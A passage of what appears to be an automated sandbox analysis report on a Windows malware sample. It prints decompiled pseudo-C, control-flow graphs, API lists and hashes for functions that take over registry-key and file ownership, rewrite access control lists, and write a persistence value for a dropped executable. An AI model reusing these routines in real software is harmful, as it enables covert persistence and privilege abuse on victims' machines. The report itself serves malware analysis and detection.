                                                                                • Sleep.KERNEL32(00001A90), ref: 0012A4C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                • String ID: "$"$"$%X%08X$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D$P$\$htdzdeug
                                                                                • API String ID: 2089075347-518652954
                                                                                • Opcode ID: 359e10d60d8d485b4bcb098b33d7e2f4978577100c9e570dc68a088cfcc2d311
                                                                                • Instruction ID: 5d4518e49affa4891067fe6358b194a82cc2b4ecc8bbf7b5ea6c5615ec1b009c
                                                                                • Opcode Fuzzy Hash: 359e10d60d8d485b4bcb098b33d7e2f4978577100c9e570dc68a088cfcc2d311
                                                                                • Instruction Fuzzy Hash: F05284B1D40269AFDF11DFA4EC89EEE7BBCAF18300F5444A5F509E2141E7709AA48B61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012199C Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 106memorylibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 905 12199c-1219cc inet_addr LoadLibraryA 906 1219d5-1219fe GetProcAddress * 3 905->906 907 1219ce-1219d0 905->907 909 121ab3-121ab6 FreeLibrary 906->909 910 121a04-121a06 906->910 908 121abf-121ac2 907->908 912 121abc 909->912 910->909 911 121a0c-121a0e 910->911 911->909 913 121a14-121a28 GetBestInterface GetProcessHeap 911->913 914 121abe 912->914 913->912 915 121a2e-121a40 HeapAlloc 913->915 914->908 915->912 916 121a42-121a50 GetAdaptersInfo 915->916 917 121a62-121a67 916->917 918 121a52-121a60 HeapReAlloc 916->918 919 121aa1-121aad FreeLibrary 917->919 920 121a69-121a73 GetAdaptersInfo 917->920 918->917 919->912 921 121aaf-121ab1 919->921 920->919 922 121a75 920->922 921->914 923 121a77-121a80 922->923 924 121a82-121a86 923->924 925 121a8a-121a91 923->925 924->923 926 121a88 924->926 927 121a93 925->927 928 121a96-121a9b HeapFree 925->928 926->928 927->928 928->919
                                                                                C-Code - Quality: 54%
                                                                                			E0012199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t27 = LoadLibraryA("Iphlpapi.dll"); // executed
				_t48 = _t27;
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20); // executed
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50); // executed
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

















                                                                                0x001219ab
                                                                                0x001219ae
                                                                                0x001219b1
                                                                                0x001219bc
                                                                                0x001219bf
                                                                                0x001219c5
                                                                                0x001219c7
                                                                                0x001219cc
                                                                                0x001219ea
                                                                                0x001219f7
                                                                                0x001219f9
                                                                                0x001219fe
                                                                                0x00121ab6
                                                                                0x00000000
                                                                                0x00121a14
                                                                                0x00121a1b
                                                                                0x00121a1d
                                                                                0x00121a23
                                                                                0x00121a28
                                                                                0x00121abc
                                                                                0x00121abc
                                                                                0x00121abe
                                                                                0x00000000
                                                                                0x00121abe
                                                                                0x00121a3c
                                                                                0x00121a40
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121a45
                                                                                0x00121a46
                                                                                0x00121a47
                                                                                0x00121a50
                                                                                0x00121a60
                                                                                0x00121a60
                                                                                0x00121a67
                                                                                0x00121aa1
                                                                                0x00121aa4
                                                                                0x00121aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121aaf
                                                                                0x00000000
                                                                                0x00121a69
                                                                                0x00121a6c
                                                                                0x00121a6d
                                                                                0x00121a73
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121a75
                                                                                0x00121a77
                                                                                0x00121a82
                                                                                0x00121a86
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121a96
                                                                                0x00121a9b
                                                                                0x00000000
                                                                                0x00121a9b
                                                                                0x00121a91
                                                                                0x00121a93
                                                                                0x00121a93
                                                                                0x00000000
                                                                                0x00121a91
                                                                                0x00121a67
                                                                                0x001219fe
                                                                                0x00000000

                                                                                APIs
                                                                                • inet_addr.WS2_32(123.45.67.89), ref: 001219B1
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00121E9E), ref: 001219BF
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 001219E2
                                                                                • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 001219ED
                                                                                • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 001219F9
                                                                                • GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,00121E9E), ref: 00121A1B
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00121E9E), ref: 00121A1D
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00121E9E), ref: 00121A36
                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00121E9E,?,?,?,?,00000001,00121E9E), ref: 00121A4A
                                                                                • HeapReAlloc.KERNEL32(?,00000000,00000000,00121E9E,?,?,?,?,00000001,00121E9E), ref: 00121A5A
                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00121E9E,?,?,?,?,00000001,00121E9E), ref: 00121A6E
                                                                                • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00121E9E), ref: 00121A9B
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00121E9E), ref: 00121AA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
                                                                                • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                • API String ID: 293628436-270533642
                                                                                • Opcode ID: 8dd5501762d5ba3b9b73b43cb438497b41b511895544566a1a0f8592b7f1965a
                                                                                • Instruction ID: a75e320d668246d2e16aeeb029080425d350d47060deede16ce814f8153518e3
                                                                                • Opcode Fuzzy Hash: 8dd5501762d5ba3b9b73b43cb438497b41b511895544566a1a0f8592b7f1965a
                                                                                • Instruction Fuzzy Hash: C9313C329012A9BFCF12DFE4EC988AEBBF9FB69341B150569E501A3110D7308E919B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00127A95 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 696 127a95-127ac2 RegOpenKeyExA 697 127ac4-127ac6 696->697 698 127acb-127ae7 GetUserNameA 696->698 699 127db4-127db6 697->699 700 127da7-127db3 RegCloseKey 698->700 701 127aed-127b1e LookupAccountNameA 698->701 700->699 701->700 702 127b24-127b43 RegGetKeySecurity 701->702 702->700 703 127b49-127b61 GetSecurityDescriptorOwner 702->703 704 127b63-127b72 EqualSid 703->704 705 127bb8-127bd6 GetSecurityDescriptorDacl 703->705 704->705 706 127b74-127b88 LocalAlloc 704->706 707 127da6 705->707 708 127bdc-127be1 705->708 706->705 709 127b8a-127b94 InitializeSecurityDescriptor 706->709 707->700 708->707 710 127be7-127bf2 708->710 711 127bb1-127bb2 LocalFree 709->711 712 127b96-127ba4 SetSecurityDescriptorOwner 709->712 710->707 713 127bf8-127c08 GetAce 710->713 711->705 712->711 716 127ba6-127bab RegSetKeySecurity 712->716 714 127cc6 713->714 715 127c0e-127c1b 713->715 717 127cc9-127cd3 714->717 718 127c4f-127c52 715->718 719 127c1d-127c2f EqualSid 715->719 716->711 717->713 720 127cd9-127cdc 717->720 723 127c54-127c5e 718->723 724 127c5f-127c71 EqualSid 718->724 721 127c31-127c34 719->721 722 127c36-127c38 719->722 720->707 725 127ce2-127ce8 720->725 721->719 721->722 722->718 726 127c3a-127c4d DeleteAce 722->726 723->724 727 127c73-127c84 724->727 728 127c86 724->728 729 127d5a-127d6e LocalAlloc 725->729 730 127cea-127cf0 725->730 726->717 731 127c8b-127c8e 727->731 728->731 729->707 735 127d70-127d7a InitializeSecurityDescriptor 729->735 730->729 732 127cf2-127d0d RegOpenKeyExA 730->732 733 127c90-127c96 731->733 734 127c9d-127c9f 731->734 732->729 736 127d0f-127d16 732->736 733->734 737 127ca1-127ca5 734->737 738 127ca7-127cc3 734->738 739 127d9f-127da0 LocalFree 735->739 740 127d7c-127d8a SetSecurityDescriptorDacl 735->740 741 127d19-127d1e 736->741 737->714 737->738 738->714 739->707 740->739 742 127d8c-127d9a RegSetKeySecurity 740->742 741->741 743 127d20-127d52 call 122544 RegSetValueExA 741->743 742->739 744 127d9c 742->744 743->729 747 127d54 743->747 744->739 747->729
                                                                                C-Code - Quality: 99%
                                                                                			E00127A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				long _t92;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				_t92 = RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28); // executed
				if(_t92 != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28); // executed
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173); // executed
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x132cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12); // executed
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00122544(0x1322f8, 0x1306dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1); // executed
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x132cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175); // executed
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}




















































                                                                                0x00127aae
                                                                                0x00127ab4
                                                                                0x00127ab7
                                                                                0x00127aba
                                                                                0x00127ac2
                                                                                0x00000000
                                                                                0x00127ac4
                                                                                0x00127adc
                                                                                0x00127adf
                                                                                0x00127ae5
                                                                                0x00127ae7
                                                                                0x00127da7
                                                                                0x00127daa
                                                                                0x00000000
                                                                                0x00127aed
                                                                                0x00127b0c
                                                                                0x00127b13
                                                                                0x00127b16
                                                                                0x00127b1c
                                                                                0x00127b1e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127b34
                                                                                0x00127b3b
                                                                                0x00127b41
                                                                                0x00127b43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127b59
                                                                                0x00127b5f
                                                                                0x00127b61
                                                                                0x00127bb8
                                                                                0x00127bcb
                                                                                0x00127bce
                                                                                0x00127bd4
                                                                                0x00127bd6
                                                                                0x00127da6
                                                                                0x00000000
                                                                                0x00127da6
                                                                                0x00127bdc
                                                                                0x00127bdf
                                                                                0x00127be1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127be9
                                                                                0x00127beb
                                                                                0x00127bee
                                                                                0x00127bf2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127bf8
                                                                                0x00127bf8
                                                                                0x00127c00
                                                                                0x00127c06
                                                                                0x00127c08
                                                                                0x00127cc6
                                                                                0x00127cc6
                                                                                0x00127cc6
                                                                                0x00127cc6
                                                                                0x00000000
                                                                                0x00127cc6
                                                                                0x00127c14
                                                                                0x00127c16
                                                                                0x00127c19
                                                                                0x00127c1b
                                                                                0x00127c4f
                                                                                0x00127c4f
                                                                                0x00127c52
                                                                                0x00127c57
                                                                                0x00127c5e
                                                                                0x00127c5e
                                                                                0x00127c5e
                                                                                0x00127c66
                                                                                0x00127c6c
                                                                                0x00127c6f
                                                                                0x00127c71
                                                                                0x00127c86
                                                                                0x00127c73
                                                                                0x00127c78
                                                                                0x00127c7f
                                                                                0x00127c7f
                                                                                0x00127c8b
                                                                                0x00127c8e
                                                                                0x00127c90
                                                                                0x00127c93
                                                                                0x00127c96
                                                                                0x00127c96
                                                                                0x00127c9d
                                                                                0x00127c9f
                                                                                0x00127ca7
                                                                                0x00127ca7
                                                                                0x00127ca9
                                                                                0x00127cac
                                                                                0x00127cb2
                                                                                0x00127cb2
                                                                                0x00127cb5
                                                                                0x00127cc3
                                                                                0x00000000
                                                                                0x00127ca1
                                                                                0x00127ca1
                                                                                0x00127ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127c1d
                                                                                0x00127c1d
                                                                                0x00127c27
                                                                                0x00127c2d
                                                                                0x00127c2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127c31
                                                                                0x00127c32
                                                                                0x00127c34
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127c34
                                                                                0x00127c36
                                                                                0x00127c38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127c40
                                                                                0x00127c46
                                                                                0x00127cc9
                                                                                0x00127cc9
                                                                                0x00127cd0
                                                                                0x00127cd0
                                                                                0x00127cd9
                                                                                0x00127cdc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127ce2
                                                                                0x00127ce8
                                                                                0x00127d5a
                                                                                0x00127d61
                                                                                0x00127d6a
                                                                                0x00127d6c
                                                                                0x00127d6e
                                                                                0x00127d72
                                                                                0x00127d78
                                                                                0x00127d7a
                                                                                0x00127d82
                                                                                0x00127d88
                                                                                0x00127d8a
                                                                                0x00127d92
                                                                                0x00127d98
                                                                                0x00127d9a
                                                                                0x00127d9c
                                                                                0x00127d9c
                                                                                0x00127d9a
                                                                                0x00127d8a
                                                                                0x00127da0
                                                                                0x00127da0
                                                                                0x00000000
                                                                                0x00127d6e
                                                                                0x00127cea
                                                                                0x00127cf0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127cff
                                                                                0x00127d05
                                                                                0x00127d0b
                                                                                0x00127d0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127d0f
                                                                                0x00127d14
                                                                                0x00127d16
                                                                                0x00127d19
                                                                                0x00127d19
                                                                                0x00127d1b
                                                                                0x00127d1c
                                                                                0x00127d1c
                                                                                0x00127d4a
                                                                                0x00127d50
                                                                                0x00127d52
                                                                                0x00127d54
                                                                                0x00127d54
                                                                                0x00000000
                                                                                0x00127d52
                                                                                0x00127b6a
                                                                                0x00127b70
                                                                                0x00127b72
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127b7b
                                                                                0x00127b84
                                                                                0x00127b86
                                                                                0x00127b88
                                                                                0x00127b8c
                                                                                0x00127b92
                                                                                0x00127b94
                                                                                0x00127b9c
                                                                                0x00127ba2
                                                                                0x00127ba4
                                                                                0x00127bab
                                                                                0x00127bab
                                                                                0x00127ba4
                                                                                0x00127bb2
                                                                                0x00127bb2
                                                                                0x00000000
                                                                                0x00127b88

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00127ABA
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00127ADF
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,0013070C,?,?,?), ref: 00127B16
                                                                                • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00127B3B
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00127B59
                                                                                • EqualSid.ADVAPI32(?,00000022), ref: 00127B6A
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00127B7E
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00127B8C
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00127B9C
                                                                                • RegSetKeySecurity.KERNEL32(00000000,00000001,00000000), ref: 00127BAB
                                                                                • LocalFree.KERNEL32(00000000), ref: 00127BB2
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00127FC9,?,00000000), ref: 00127BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D
                                                                                • API String ID: 2976863881-60433687
                                                                                • Opcode ID: 2ff9b21b0810ca9b68eeb28765c15f9f59a0ef5cba3a90553cfedce8c719cb56
                                                                                • Instruction ID: 15672e6e2d7709ad4f24f8d6d67552fa9974144ac70ea8757eb8ecda04cea6d2
                                                                                • Opcode Fuzzy Hash: 2ff9b21b0810ca9b68eeb28765c15f9f59a0ef5cba3a90553cfedce8c719cb56
                                                                                • Instruction Fuzzy Hash: 17A13B71904229ABDF129FA0EC98FEFBBB9FF48740F144069F505E2190E7359A95CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00127809 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 748 127809-127837 GetUserNameA 749 127a8e-127a94 748->749 750 12783d-12786e LookupAccountNameA 748->750 750->749 751 127874-1278a2 GetLengthSid GetFileSecurityA 750->751 751->749 752 1278a8-1278c3 GetSecurityDescriptorOwner 751->752 753 1278c5-1278da EqualSid 752->753 754 12791d-12793b GetSecurityDescriptorDacl 752->754 753->754 755 1278dc-1278ed LocalAlloc 753->755 756 127941-127946 754->756 757 127a8d 754->757 755->754 758 1278ef-1278f9 InitializeSecurityDescriptor 755->758 756->757 759 12794c-127955 756->759 757->749 760 127916-127917 LocalFree 758->760 761 1278fb-127909 SetSecurityDescriptorOwner 758->761 759->757 762 12795b-12796b GetAce 759->762 760->754 761->760 763 12790b-127910 SetFileSecurityA 761->763 764 127971-12797e 762->764 765 127a2a 762->765 763->760 767 127980-127992 EqualSid 764->767 768 1279ae-1279b1 764->768 766 127a2d-127a37 765->766 766->762 771 127a3d-127a41 766->771 769 127994-127997 767->769 770 127999-12799b 767->770 772 1279b3-1279bd 768->772 773 1279be-1279d0 EqualSid 768->773 769->767 769->770 770->768 774 12799d-1279ac DeleteAce 770->774 771->757 775 127a43-127a54 LocalAlloc 771->775 772->773 776 1279d2-1279e3 773->776 777 1279e5 773->777 774->766 775->757 778 127a56-127a60 InitializeSecurityDescriptor 775->778 779 1279ea-1279ed 776->779 777->779 780 127a62-127a71 SetSecurityDescriptorDacl 778->780 781 127a86-127a87 LocalFree 778->781 782 1279f8-1279fb 779->782 783 1279ef-1279f5 779->783 780->781 784 127a73-127a81 SetFileSecurityA 780->784 781->757 785 127a03-127a0e 782->785 786 1279fd-127a01 782->786 783->782 784->781 787 127a83 784->787 788 127a10-127a17 785->788 789 127a19-127a24 785->789 786->765 786->785 787->781 790 127a27 788->790 789->790 790->765
                                                                                C-Code - Quality: 98%
                                                                                			E00127809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				int _t87;
				int _t95;
				int _t100;
				struct _ACL* _t110;
				int _t116;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				_t87 = GetUserNameA( &_v384,  &_v36); // executed
				if(_t87 == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				_t95 = LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56); // executed
				if(_t95 == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				_t100 = GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44); // executed
				if(_t100 == 0) {
					goto L42;
				}
				if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
					_v36 = 0x80;
					_v40 = 0x80;
					if(EqualSid( &_v128, _v16) == 0) {
						_v28 = 1;
						_t155 = LocalAlloc(0x40, 0x14);
						if(_t155 != 0) {
							if(InitializeSecurityDescriptor(_t155, 1) != 0 && SetSecurityDescriptorOwner(_t155,  &_v128, 0) != 0) {
								SetFileSecurityA(_a4, 1, _t155); // executed
							}
							LocalFree(_t155);
						}
					}
				}
				_v24 = _t141;
				if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
					L41:
					goto L42;
				}
				_t110 = _v20;
				if(_t110 == _t141) {
					goto L41;
				}
				_v8 = _v8 & _t141;
				if(0 >= _t110->AceCount) {
					goto L41;
				} else {
					goto L13;
				}
				do {
					L13:
					if(GetAce(_t110, _v8,  &_v12) == 0) {
						L32:
						_v8 = _v8 + 1;
						goto L33;
					}
					_t153 = 0;
					_v16 = _v12 + 8;
					if(_t141 <= 0) {
						L19:
						if(_t141 < 0x20) {
							 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
							_t141 = _t141 + 1;
						}
						_t120 = EqualSid( &_v128, _v16);
						_t146 = _v12;
						if(_t120 == 0) {
							_t121 = 0x1200a8;
						} else {
							asm("sbb eax, eax");
							_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
						}
						if( *((intOrPtr*)(_t146 + 4)) != _t121) {
							 *((intOrPtr*)(_t146 + 4)) = _t121;
							_t146 = _v12;
							_v24 = 1;
						}
						if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
							 *_t146 = 0;
